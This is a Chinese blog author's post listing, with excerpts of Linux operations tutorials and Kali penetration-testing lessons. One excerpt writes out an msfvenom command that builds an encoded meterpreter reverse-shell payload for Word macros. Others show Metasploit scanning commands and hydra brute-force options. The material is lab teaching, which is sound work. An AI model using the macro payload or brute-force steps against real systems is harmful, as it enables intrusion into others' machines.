- 博客(134)
- 收藏
- 关注
RSS订阅
原创 Linux云计算大神-带你安装MySQL数据库并去除安全隐患
Mariabd安全配置向导1.安装完mariadb-server后,运行mysql_secure_installation去除安全隐患mysql_secure_installation会执行几个设置:为root用户设置密码删除匿名账号取消root用户远程登录删除test库和对test库的访问权限刷新授权表使修改生效[root@xuegod63 ~]# mysql_secure_installation #进入安全配置向导通过这几项的设置能够提高MySQL库的安全。建议生产环境中My.
2021-07-31 09:56:31
1230
40
原创 世界500强是如何解决千亿流量留存问题的,《Ceph分布式存储架构》-使用CentOS 7部署 Ceph分布式存储架构-为他们解决什么问题。
注:元数据:保存了子目录和子文件的名称 及inode编号的数据,通过元数据,可以找到对应的真实的数据,及真实数据所在的服务器。有点像字典前面的索引或yum源的缓存
2021-07-29 11:09:36
1640
54
原创 Linux云计算 --中国三大电商大厂都在使用的《 GitLab与Jenkins结合构建持续集成(CI)环境》是如何排列
文章目录1 持续集成概述和搭建Gitlab平台1.1持续集成概述1.2jenkins和Gitlab概述GitLab概述:1.3GitLab和GitHub的区别1.4 搭建GitLab平台2 配置gitlab邮件服务和对gitlab平台汉化2.1 管理gitlab服务2.2 配置gitlab邮件服务1.开启邮箱的SMTP服务2. 编辑/etc/gitlab/gitlab.rb文件,配置STMP邮件发送服务。前提你的邮件已经开通stmp/pop3收发功能3 通过命令行测试邮件是否发送成功(也可以不测).
2021-07-28 14:01:36
1282
18
原创 京东、知乎、天猫等各大平台的K8S架构你知道多少?
K8s(kubernetes)作为行业的新宠,近期都霸屏了!云原生计算基金会(Cloud Native Computing Foundation)公布了第三次中国云原生调查报告,报告显示49%的受访者在生产中使用容器,72%的受访者在生产中使用Kubernetes(简称K8s),公有云使用率下降至36%,更多的企业选择混合云。Kubernetes作为容器管理工具在企业使用占比越来越高,世界500强企业也都以K8S作为核心技术支撑,大公司都在争夺K8S人才。国内外知名公司都在基于Kubernetes搭建智
2021-07-19 14:39:09
3193
30
原创 什么是 shell?
文章目录1 什么是 shell?2扩展:编程语言分类1)低级语言:2)高级语言:3什么是 SHELL 脚本?1 什么是 shell?Shell 是一个命令解释器,它在操作系统的最外层,负责直接与用户进行对话,把用户的输入解释给操作系统,并处理各种各样的操作系统的输出结果,输出到屏幕反馈给用户。这种对话方式可以是交互式也可以是非交互式的我们所输入的命令计算机是不识别的,这时就需要一种程序来帮助我们进行翻译,变成计算机能识别的二进制程序,同时又把计算机生成的结果返回给我们。当前终端使用的哪种
2021-07-15 14:55:39
1744
21
原创 20位大佬,勾勒出一个中国网络安全江湖
文章目录一、为大家介绍20位大佬?一 西安:西交大、西电、西工大360 集团董事长兼 CEO:周鸿祎赛博英杰 CEO:谭晓生腾讯副总裁:丁珂阿里云:吴翰清知道创宇 CTO&COO:杨冀龙二 合肥:中科大、安医大深信服 CEO:何朝曦360 首席科学家:潘剑锋腾讯安全:TK 教主云深互联 CEO:陈本峰三 哈尔滨:哈工大、哈工程安天集团:肖新光360 集团首席安全官:杜跃进安芯网盾 CEO、CTO:姜向前、姚纪卫四 上海:复旦、同济、上海交大腾讯安全:吴石启明星辰集团 CEO:严望佳同济:季昕华五 .
2021-06-28 15:31:48
4421
原创 搭建Prometheus+Grafana的云平台监控系统
1.1 Prometheus和Grafana概述1.1.1 Prometheus概述Prometheus(普罗米修斯)是一套开源的监控&报警&时间序列数据库的组合,起始是由SoundCloud公司开发的。现在最常见的Docker、Mesos、Kubernetes容器管理系统中,通常会搭配Prometheus进行监控。 Prometheus [prəˈmiθju:s] 普罗米修斯Prometheus基本原理是通过HTTP协议周期性抓取被监控组件的状态,这样做的好处是任意组件只要提供.
2021-06-16 14:41:49
6915
29
原创 十条运维经验,帮你远离故障
1. 确保变更可以回滚佛说:“每次创伤都是一次成熟”。这是运维人员的真实写照。从某种意义上讲,运维是一份不断犯错、不断积累经验的工作。以前没有经历的东西,总是不定期的给你痛击。所以请保护好变更的现场,使得变更有回头的机会。2. 小心破坏性的操作什么是破坏性的操作?比如:对 Oracle 而言,有truncate table_name,delete table_name,drop table_name。这些语句执行起来轻松简单也惬意极了,但记住:即便数据可被回滚,其代价也是非常大!对Linux而
2021-06-03 10:35:16
1156
8
原创 Docker+ Kubernetes已成为云计算的主流
k8s和Docker的胜利,意味着这是有史以来第一次,无论使用哪一种云平台,研发人员都可以拥有完全相同的计算环境。
2022-04-19 18:00:00
748
原创 Linux云计算之VSFTP服务器概述-安装vsftp服务器端、客户端
VSFTP服务器概述FTP服务概述FTP服务器(File Transfer ProtocolServer)是在互联网上提供文件存储和访问服务的计算机,它们依照FTP协议提供服务。FTP(File Transfer Protocol: 文件传输协议)作用:Internet 上用来传送文件的协议。常见FTP服务器:Windows:Serv-U 、FTP Server、filezilla_serverLinux:ProFTPD:(Professional FTP daemon)一个Unix平台上或
2022-03-31 16:37:16
5762
原创 Linux云计算之使用DHCP为局域网中的机器分配IP地址
实战:使用DHCP为局域网中的机器分配IP地址首先为了避免和当前网络环境中DHCP冲突,我们使用虚拟机自定义的网络模式:使用VMnet2即可安装DHCP1.使用yum进行安装。[root@xuegod63 ~]# yum -y install dhcp #使用yum安装DHCP。2.配置文件位置:主配置文件:[root@xuegod63 ~]# vim /etc/dhcp/dhcpd.conf## DHCP Server Configuration file.# see /
2022-03-29 16:57:45
4820
原创 Linux云计算之在Centos部署PXC高可用集群
安装PXC集群软件包PXC实验环境说明系统使用CentOS7.6以上,关闭防火墙,关闭selinux,配好ip,配好网络yum源环境说明如下Node Host IP Addr DescpritionNode1 xuegod63.cn 192.168.1.63/24 集群节点1Node2 xuegod64.cn 192.168.1.64/24 集群节点2Node3 xuegod62.cn 192.168.1.62/24 集群节点3说明Percona XtrDB Cluster 属于
2022-03-28 17:01:02
2127
原创 网络安全kali之利用宏感染word文档获取shell
首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。┌──(root💀xuegod53)-[~]└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe执行完成后会生成2段代码第一段代码是MACRO CODE [ˈmækrəʊ k
2022-03-25 17:02:01
8174
3
原创 网络安全Kali之基于SSH、FTP协议收集信息
基于SSH协议收集信息查看ssh服务的版本信息msf6 > use auxiliary/scanner/ssh/ssh_versionmsf6 auxiliary(scanner/ssh/ssh_version) > show optionsmsf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180msf6 auxiliary(scanner/ssh/ssh_version) > run对SSH
2022-03-24 16:18:58
6007
1
原创 网络安全 Kali web安全 基于SMB协议收集信息
SMB概述:服务器消息块(Server Message Block,缩写为SMB),又称网络文件共享系统(Common Internet File System,缩写为CIFS),一种应用层网络传输协议,由微软开发,主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。经过Unix服务器厂商重新开发后,它可以用于连接Unix服务器和Windows客户机,执行打印和文件共享等任务。
2022-03-23 16:42:32
630
原创 Linux云计算之linux grep命令详解
简介grep (global search regular expression(RE) and print out the line,全面搜索正则表达式并把行打印出来)是一种强大的文本搜索工具,它能使用正则表达式搜索文本,并把匹配的行打印出来。Unix的grep家族包括grep、egrep和fgrep。egrep和fgrep的命令只跟grep有很小不同。egrep是grep的扩展,支持更多的re元字符,fgrep就是fixed grep或fastgrep,它们把所有的字母都看作单词,也就是说,正
2022-03-22 16:59:36
432
原创 Linux运维技术之Linux云计算架构
最内层是硬件,最外层是用户常用的应用,比如说firefox浏览器,evolution查看邮件,一个计算流体模型等等。硬件是物质基础,而应用提供服务。但在两者之间,还要经过一番周折。
2022-03-18 16:51:33
1078
原创 Golang 1.18正式版发布,正式加入泛型语言家庭
大前天,Golang开发团队正式发Golang 1.18,可以通过官方下载页面下载,下载后注意核对校验码。Golang 1.18 是一个功能上变化较大的大型版本,在语言层面增加了泛型、增加了Fuzzing、工作区以及性能上的改进。之前我们已经文章中虫虫给大家已经详细介绍过,在此,略要地介绍一下。泛型Golang 1.18 中,新引入了新的支持使用参数化类型的泛型。支持泛型一直是Golang社区最迫切的功能需求之一,今天终于算是圆梦了,Golang正式跨入泛型语言家族。func Reverse (.
2022-03-17 16:36:17
1074
4
原创 网络安全 kali Web安全之CSRF攻击
CSRF(Cross Site Request Forgery),中文是跨站点请求伪造。CSRF攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。
2022-03-16 16:33:29
874
原创 Web安全渗透测试基本流程
对于web应用的渗透测试,大致可分为三个阶段:信息收集、漏洞发现以及漏洞利用。在实践过程中需要进一步明细测试的流程,以下通过9个阶段来描述渗透测试的整个流程:1.明确目标1)确定范围:测试的范围,如:IP、域名、内外网、整站or部分模块2)确定规则:能渗透到什么程度(发现漏洞为止or继续利用漏洞)、时间限制、能否修改上传、能否提权…目标系统介绍、重点保护对象及特性。是否允许数据破坏?是否允许阻断业务正常运行?测试之前是否应当知会相关部门接口人?接入方式?外网和内网?测试是发现问题就算.
2022-03-15 16:17:19
2796
原创 网络安全 kali web安全【渗透测试】目录遍历漏洞
许多的Web应用程序一般会有对服务器的文件读取查看的功能,大多会用到提交的参数来指明文件名形如:http://www.nuanyue.com/getfile=image.jgp当服务器处理传送过来的image.jpg文件名后,Web应用程序即会自动添加完整路径,形如“d://site/images/image.jpg”,将读取的内容返回给访问者。初看,在只是文件交互的一种简单的过程,但是由于文件名可以任意更改而服务器支持“~/”,“…/”等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网
2022-03-14 16:47:49
687
原创 【Kali】中密码暴力破解工具hydra的使用
前言hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。本文仅从安全角度去讲解工具的使用,请勿用于非法用途。hydra参数讲解-R #继续从上一次进度接着破解。-S #采用SSL链接。-s #PORT 可通过这个参数指定非默认端口。-l #LOGIN 指定破解的用户,对特定用户破解。-L #FILE 指定用户名字典。-p #PASS 小写,指定密码破解,少用,一般是采用密
2022-03-10 16:05:10
15311
5
原创 Linux curl命令详解
命令:curl在Linux中curl是一个利用URL规则在命令行下工作的文件传输工具,可以说是一款很强大的http命令行工具。它支持文件的上传和下载,是综合传输工具,但按传统,习惯称url为下载工具。语法:# curl [option] [url]常见参数:-A/--user-agent <string> 设置用户代理发送给服务器-b/--cookie <name=string/file> cookie字符串或文件读取位置-c/--coo
2022-03-09 16:08:27
4460
原创 网络安全kali web安全 Kali之msf简单的漏洞利用
信息收集靶机的IP地址为:192.168.173.136利用nmap工具扫描其开放端口、系统等整理一下目标系统的相关信息系统版本:Windows server 2003开放的端口及服务:21/tcp ftp135/tcp msrpc139/tcp netbios-ssn445/tcp microsoft-ds777/tcp multiling-http1025/tcp NFS-or-IIS1026/tcp LSA-or-nterm1029/tcp ms
2022-03-08 15:57:32
11986
4
原创 Kali入门配置使用(一)
Kali Linux是基于Debian的Linux发行版,设计用于数字取证操作系统。Kali Linux预装了许多渗透测试软件,包括nmap、Wireshark、John the Ripper,以及Aircrack-ng.用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook
2022-03-07 16:35:03
3211
原创 网络安全kali渗透学习 web渗透入门 Metasploit---基于SMB协议收集信息
SMB概述:服务器消息块(Server Message Block,缩写为SMB),又称网络文件共享系统(Common InternetFile System,缩写为CIFS),一种应用层网络传输协议,由微软开发,主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。经过Unix服务器厂商重新开发后,它可以用于连接Unix服务器和Windows客户机,执行打印和文件共享等任务。使用smb_version 基于SMB协议扫描版本号msf6 > use auxiliary.
2022-03-04 16:42:40
2982
原创 网络安全kali渗透学习 web渗透入门 Metasploit---基于tcp协议收集主机信息
我们前面学习了主动信息收集和被动信息收集,而且还学习了漏洞检测工具NESSUS,接下来给大家讲解使用Metasploit来对目标进行信息收集,这个过程包含了前面所有的方式以及多了一些更加极端的获取信息方式,比如获取服务器的硬件信息,系统用户信息、进程信息等。使用Metasploit中的nmap和arp_sweep 收集主机信息Metasploit中也有NMAP工具┌──(root💀xuegod53)-[~]└─# msfconsolemsf6 > db_nmap -sV 192.168
2022-03-03 16:37:53
3535
原创 网络安全kali渗透学习 web渗透入门 使用msf扫描靶机上mysql服务的空密码
我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180
2022-03-02 14:15:43
3212
2
原创 网络安全kali渗透学习 web渗透入门 Metasploit渗透测试框架介绍-Metasploitable2-Linux 靶机系统介绍
Metasploit是一个免费的、可下载的框架,通过它可以很容易对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D.Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
2022-02-28 15:19:32
2171
原创 网络安全kali渗透学习 web渗透入门 Metasploit基本使用方法
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。这篇文章教大家了解Metasploit基本使用方法以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/kali/黑客/web安全/渗透测
2022-02-25 17:08:34
2958
原创 网络安全kali渗透学习 web渗透入门Metasploitable2靶机系统介绍
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。这篇文章教大家了解Metasploitable2靶机系统以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套
2022-02-24 17:36:01
4184
原创 网络安全kali渗透学习 web渗透入门 Metasploit 渗透测试框架介绍
Metasploit是一个渗透测试平台,使您能够查找,利用和验证漏洞。该平台包括Metasploit框架及其商业对手,如Metasploit Pro。这篇文章教大家了解渗透测试整体框架以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套课程-小白入门到精通!_哔哩哔哩_bilibili文字版↓:年底了号主把我自己用到所有技术“做过的实战项目-内网实战靶场环境
2022-02-22 17:29:34
366
原创 网络安全kali渗透学习 web渗透入门 如何进行NESSUS漏洞检测
NESSUS简介1998年,Nessus的创办人Renaud Deraison展开了一项名为"Nessus"的计划,其计划目的是希望能为互联网社群提供一个免费、威力强大、更新频繁并简易使用的远端系统安全扫描程式。2002年时,Renaud与Ron Gula, Jack Huffard创办了一个名为Tenable Network Security机构。在第三版的Nessus释出之时,该机构收回了Nessus的版权与程式源代码(原本为开放源代码),并注册了nessus.org成为该机构的网站。目前此机构位于美
2022-02-21 17:23:36
3162
1
原创 网络安全kali渗透学习 web渗透入门 NAMP高级使用技巧和如何进行漏洞挖掘
nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。还可以探测操作系统类型。这篇文章教大家使用NMAP的技巧和如何进行漏洞扫描以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公
2022-02-18 17:48:21
1432
原创 网络安全kali渗透学习 web渗透入门 使用WireShark对常用协议抓包
协议分析的时候我们关闭混淆模式,避免一些干扰的数据包存在。这篇文章教大家如何使用WireShark对常用协议抓包并分析原理以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套课程-小白入门到精通!_哔哩哔哩_bilibili文字版↓:年底了号主把我自己用到所有技术“做过的实战项目-内网实战靶场环境-渗透工具”还有很多渗透思维图谱!常用协议分析-ARP协议
2022-02-17 18:31:34
1349
原创 网络安全kali渗透学习 web渗透入门 WireShark抓包及常用协议分析
Wireshark是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。这篇文章教大家WireShark抓包及常用协议分析以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套课程-小白入门到精通!_哔哩哔哩_bilibili文字版↓:年底了
2022-02-16 17:32:23
4032
原创 网络安全kali渗透学习 web渗透入门 DDOS的原理和防护
DDOS分布式拒绝服务攻击(英文意思是Distributed Denial of Service,简称DDoS)是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击,或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击。由于攻击的发出点是分布在不同地方的,这类攻击称为分布式拒绝服务攻击,其中的攻击者可以有多个。这篇文章教大家DDOS的原理和防护以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/
2022-02-15 17:31:47
2328
原创 网络安全kali渗透学习 web渗透入门 如何进行基于Nmap的扫描方式
Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。nmap扫主要包括四个方面的扫描功能分别是主机发现(Host Discovery)、端口扫描(Port Scanning)、应用与版本侦测(Version Detection)、操作系统侦测(Operating System Detection)。这四项功能之间,又存在大致的依赖关系。这篇文章教大家如何进行基于Nmap的扫描以
2022-02-14 17:39:11
786
原创 网络安全kali渗透学习 web渗透入门 如何进行基于ping命令的探测
ping命令是测试网络连接、信息发送和接收状况的实用型工具,是系统内置的探测性工具。它的原理是:每台网络上的主机都有唯一确定的IP地址,用户给目标IP发送一个数据报,对方就要返回一个同样大小的数据报。而我们根据返回的数据报就可以判断目标主机的存在。这篇文章教大家如何进行基于ping命令的探测以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全kali/web安全/渗透测试/-小白入门到精通 最网最全内容!_哔哩哔哩_bil
2022-02-11 17:35:31
913
1
原创 网络安全kali渗透学习 web渗透入门 OSI各层进行功能上的详解阐述
以下对OSI各层进行功能上的大概阐述,不详细深究。因为每一层实际都是一个复杂的层。后面我也会根据个人方向展开部分层的深入学习。这里我们就大概了解一下。我们从最顶层——应用层 开始介绍。整个过程以公司A和公司B的一次商业报价单发送为例子进行讲解。以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全kali/web安全/渗透测试/-小白入门到精通 最网最全内容!_哔哩哔哩_bilibili文字版↓:年底了号主把我自己
2022-02-10 17:17:08
2467
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人